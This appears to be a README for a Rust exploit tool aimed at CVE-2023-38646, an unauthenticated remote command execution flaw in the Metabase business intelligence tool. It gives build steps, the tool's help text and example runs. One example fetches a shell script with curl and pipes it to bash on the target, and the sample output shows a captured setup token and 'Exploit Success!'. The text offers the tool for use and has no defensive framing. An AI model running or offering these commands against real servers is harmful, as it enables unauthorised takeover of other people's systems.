Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources. This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication
First perform the compilation with the command:
cargo build --release
You can do it in these two ways:
cargo run -- --url http://localhost --command "curl <ip>"
.\target\release\cve_2023_38646 --url http://localhost --command "curl <ip>"
This will display help for the tool. Here are all the switches it supports:
CVE-2023-38646
Usage: cve_2023_38646 --url <URL> --command <COMMAND>
Options:
-u, --url <URL> Insert URL
-c, --command <COMMAND> Insert command
-h, --help Print help
cargo run -- --url http://example.com --command "curl 127.0.0.1/shell.sh |bash"
[+] Token: 7cdac991-5fbd-4c3c-b6a7-0c80b3f66abc
[+] Exploit Success!